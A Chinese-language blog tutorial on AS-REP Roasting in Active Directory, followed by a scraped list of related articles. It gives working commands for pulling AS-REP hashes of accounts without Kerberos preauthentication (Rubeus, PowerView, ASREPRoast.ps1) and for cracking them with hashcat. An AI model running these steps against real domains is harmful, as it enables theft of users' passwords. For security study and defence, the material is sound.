AS-REP Roasting攻击
目录
前言
AS-REP Roasting攻击条件
普通域用户下
使用:Rubeus.exe
工具二:powershell脚本
域外
前言
AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。但是该攻击方式利用比较局限,因为其需要用户账号设置 "Do not require Kerberos preauthentication(不需要kerberos预身份验证) " 。而该属性默认是没有勾选上的。
预身份验证是Kerberos身份验证的第一步(AS_REQ & AS_REP),它的主要作用是防止密码脱机爆破。默认情况下,预身份验证是开启的,KDC会记录密码错误次数,防止在线爆破。
当关闭了预身份验证后,攻击者可以使用指定用户去请求票据,此时域控不会作任何验证就将 TGT票据 和 该用户Hash加密的Login Session Key返回。因此,攻击者就可以对获取到的用户Hash加密的Login Session Key进行离线破解,如果破解成功,就能得到该指定用户的密码明文。
AS-REP Roasting攻击条件
- 域用户设置了 “ Do not require Kerberos preauthentication(不需要kerberos预身份验证) ”
- 需要一台可与域控进行通信的主机/用户
普通域用户下
普通域用户登录,执行如下操作
使用:Rubeus.exe
Rubeus.exe:https://codeload.github.com/shanfenglan/test/zip/refs/heads/master
1. 获取用户hash
该工具会自动获取未开启预身份验证的域用户,然后返回该用户的hash
Rubeus.exe asreproast
将该hash保存下来
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
2. 使用hashcat离线爆破
Hashcat是自称世界上最快的密码恢复工具。它在2015年之前拥有专有代码库,但现在作为免费软件发布。适用于Linux,OS X和Windows的版本可以使用基于CPU或基于GPU的变体。支持hashcat的散列算法有Microsoft LM哈希,MD4,MD5,SHA系列,Unix加密格式,MySQL和Cisco PIX等。参考:https://xz.aliyun.com/t/4008
地址:hashcat - advanced password recovery
hashcat.exe -m 18200 hashes.txt pass.txt --force
-m hash类型
18200代表 | Kerberos 5, etype 23, AS-REP | Network Protocol
工具二:powershell脚本
1. 使用Empire下的powerview.ps1查找域中设置了 "不需要kerberos预身份验证" 的用户
Import-Module .\powerview.ps1Get-DomainUser -PreauthNotRequired
但是我这里运行就报错了,不知道为啥
2. 获取用户后,接着使用ASREPRoast.ps1获取AS-REP返回的Hash
可参考下面的ASREPRoast.ps1用法
域外
对于非域内的机器,无法通过LDAP来发起用户名的查询。所以要想获取 "不需要kerberos预身份验证" 的域内账号,只能通过枚举用户名的方式来获得。 而AS-REP Hash方面,非域内的主机,只要能和DC通信,便可以获取到。使用ASREPRoast.ps1,通过指定Server的参数即可
1. 对域内用户枚举,如使用kerbrute工具
2. 使用ASREPRoast.ps1
地址:ASREPRoast/ASREPRoast.ps1 at master · HarmJ0y/ASREPRoast · GitHub
Import-Module .\ASREPRoast.ps1
Get-ASREPHash -UserName yuwin2012 -Domain test.lab -Server 192.168.10.2 | Out-File -Encoding ASCII hash.txt
AS-REP Roasting攻击相关推荐
- 域渗透 | kerberos认证及过程中产生的攻击
前言 Windows认证一般包括本地认证(NTLM HASH)和域认证(kerberos). 认证的原理网上有很多文章.如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课 https://www.bil ...
- 红队技巧-域渗透的协议利用
1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须 ...
- 域控-笔记二(域权限,域组,域管理,Kerberso 协议)
文章目录 一. 域环境搭建 1.1 添加AD功能 1.2 安装 1.3 部署 二. 如何加入域 2.1 加入域 2.2 域中主机登录 2.3 退出域 2.4 添加域用户 三. 域权限 3.1 A-G- ...
- HTB打靶(Active Directory 101 Mantis)
namp扫描 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 03:40 EST Stats: 0:01:28 elapsed; 0 hos ...
- 《域渗透攻防指南》签名版预售来啦
千呼万唤始出来!终于,在广大粉丝翘首期盼下,国内首本专门讲述域内攻防的书籍<域渗透攻防指南>在2022年最后一个月和大家见面了.为了回馈粉丝的等待,让粉丝早日拿到心仪的书,特此联合机械工业 ...
- [转]Windows Notes And Cheatsheet
原文:https://github.com/m0chan/m0chan.github.io/blob/master/_posts/2019-07-30-Windows-Notes-and-Cheats ...
- 全网最详细 | Kerberos协议详解
目录 Kerberos基础 PAC特权属性证书 1. PAC结构 2. PAC凭证信息 3. PAC签名 4. KDC验证PAC 5. PAC在kerberos中的优缺点 Kerberos实验 AS- ...
- 0x02 内网渗透篇
来源如下图:(微信公众号:0x00实验室) 00 - 内网渗透的流程 拿到跳板后,先探测一波内网存活主机,用net user /domian命令查看跳板机是否在域内,探测存活主机.提权.提取hash ...
- 【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有 这一篇真的够了
目录 面经 牛客 奇安信面经(五星推荐) 牛客面经(推荐) 渗透测试面经(推荐) 渗透测试技巧 计网面经 SQL注入漏洞 注入绕过 XXE漏洞 最强面经 Github面经 模拟面 WEB安全 PHP安 ...
- Analyzing User-Level Privacy Attack Against Federated Learning
Analyzing User-Level Privacy Attack Against Federated Learning IEEE JSAC CCF-A期刊 宋梦凯(武汉大学网络安全实验室) Su ...
最新文章
- 利用MingW检验程序运行内存
- python实例 列表
- nidlist 问题
- 10道Python面试常见的问题
- android获取app用户数据,Android 原生app获取用户授权访问Autodesk云应用数据
- CentOS 7 防火墙命令
- 青出于蓝而胜于蓝,超越MixUp、CutMix的样本混合数据增广新算法FMix
- 音频编码:ADPCM
- west-first路由算法
- 【算法】—— 最大子序列和问题
- 用Excel拟合imu温度趋势线
- IoT名企:物联网云服务龙头企业软硬实力兼备,机智云喜获高新技术企业认定
- 信号电缆与计算机电缆区别,控制电缆与计算机电缆有什么区别
- 一张图说明softmax layer是什么
- pta——出生年,查验身份证(c语言)
- go比python的优缺点
- java俄罗斯方块(新手版)
- 清华大学计算机系研究生培养方案,攻读硕士学位研究生培养方案
- 康普分享未来网络四大趋势 光纤将是最佳主角
- 搞 IT 搞累了,来看看美图吧。
热门文章
- 80端口封了怎么办,利用80端口映射解决
- ubuntu美化之conky美化
- C语言如何求球的体积和表面
- 0006 -求三个数的平均数
- 计算机自检报错无法开机,常见电脑开机自检BIOS错误提示解决方法
- 携程酒店价格关键信息记录
- Python使用wordcloud词云库——中文乱码
- 1005打印任务取消不了 hp_1005打印任务取消不了 hp_解决hp1005打印机无法打印故障...
- VMware ESXi 7.0 U2 SLIC Unlocker USB 网卡驱动集成镜像 202109 更新
- 百度竞价推广之关键词选择技巧